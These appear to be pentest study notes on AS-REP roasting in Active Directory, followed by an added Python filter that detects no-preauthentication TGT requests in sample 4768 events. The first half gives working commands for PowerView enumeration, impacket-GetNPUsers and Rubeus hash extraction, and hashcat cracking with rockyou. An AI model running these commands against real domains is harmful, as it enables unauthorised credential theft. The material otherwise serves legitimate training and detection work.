AS-REP Roasting
An account is vulnerable when its "Do not require Kerberos preauthentication" option is enabled. We send an AS-REQ for that user, and the AS-REP we receive contains the user's hash.
Checking user
- . .\Powerview.ps1
- Get-DomainUser -PreauthNotRequired -Verbose
Extracting hash
1st method: on Linux
- impacket-GetNPUsers -dc-ip <ip> -request -outputfile <file-to-store-hash> <domain>/<user>
- impacket-GetNPUsers -dc-ip 192.168.50.70 -request -outputfile hashes.asreproast corp.com/pete
2nd method: on a compromised Windows machine
- Using Rubeus
- .\Rubeus.exe asreproast /nowrap
Hash cracking
- sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
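On the domain controller, the AS-REQ without preauthentication described above is logged as Security event 4768 with PreAuthType 0. The following is an added example, not part of the original notes: it filters constructed sample events for that pattern. The user names other than pete, the source addresses and the "high"/"review" priority rule are assumptions.

```python
from collections import defaultdict

# Constructed sample records using field names from Windows Security
# event 4768 (Kerberos TGT requested). Users and addresses are made up.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "pete", "IpAddress": "::ffff:192.168.50.80",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "dave", "IpAddress": "::ffff:192.168.50.80",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "jen", "IpAddress": "::ffff:192.168.50.75",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "svc_old", "IpAddress": "::ffff:192.168.50.91",
     "PreAuthType": "0", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "pete", "IpAddress": "::ffff:192.168.50.80",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
]

RC4_HMAC = 0x17  # etype 23, the encryption type hashcat mode 18200 works on


def find_no_preauth_tgts(events):
    """Return successful TGT issuances where no pre-authentication was supplied."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4768 or int(ev.get("Status", "0x1"), 16) != 0:
            continue  # not a TGT request, or the request failed
        if ev.get("PreAuthType") != "0":
            continue  # pre-authentication was performed
        etype = int(ev.get("TicketEncryptionType", "0x0"), 16)
        hits.append({"user": ev["TargetUserName"],
                     "source": ev["IpAddress"].replace("::ffff:", ""),
                     "rc4": etype == RC4_HMAC})
    return hits


def summarize_by_source(hits):
    """Group hits per source; the priority rule is an assumed heuristic."""
    by_src = defaultdict(lambda: {"users": set(), "rc4": False})
    for h in hits:
        by_src[h["source"]]["users"].add(h["user"])
        by_src[h["source"]]["rc4"] |= h["rc4"]
    return {src: {"users": sorted(v["users"]), "rc4": v["rc4"],
                  "priority": "high" if v["rc4"] and len(v["users"]) > 1 else "review"}
            for src, v in by_src.items()}


if __name__ == "__main__":
    for src, info in summarize_by_source(find_no_preauth_tgts(SAMPLE_EVENTS)).items():
        print(src, info)
```

Every account the filter returns has preauthentication disabled, so the same output doubles as a list of accounts to re-enable it on.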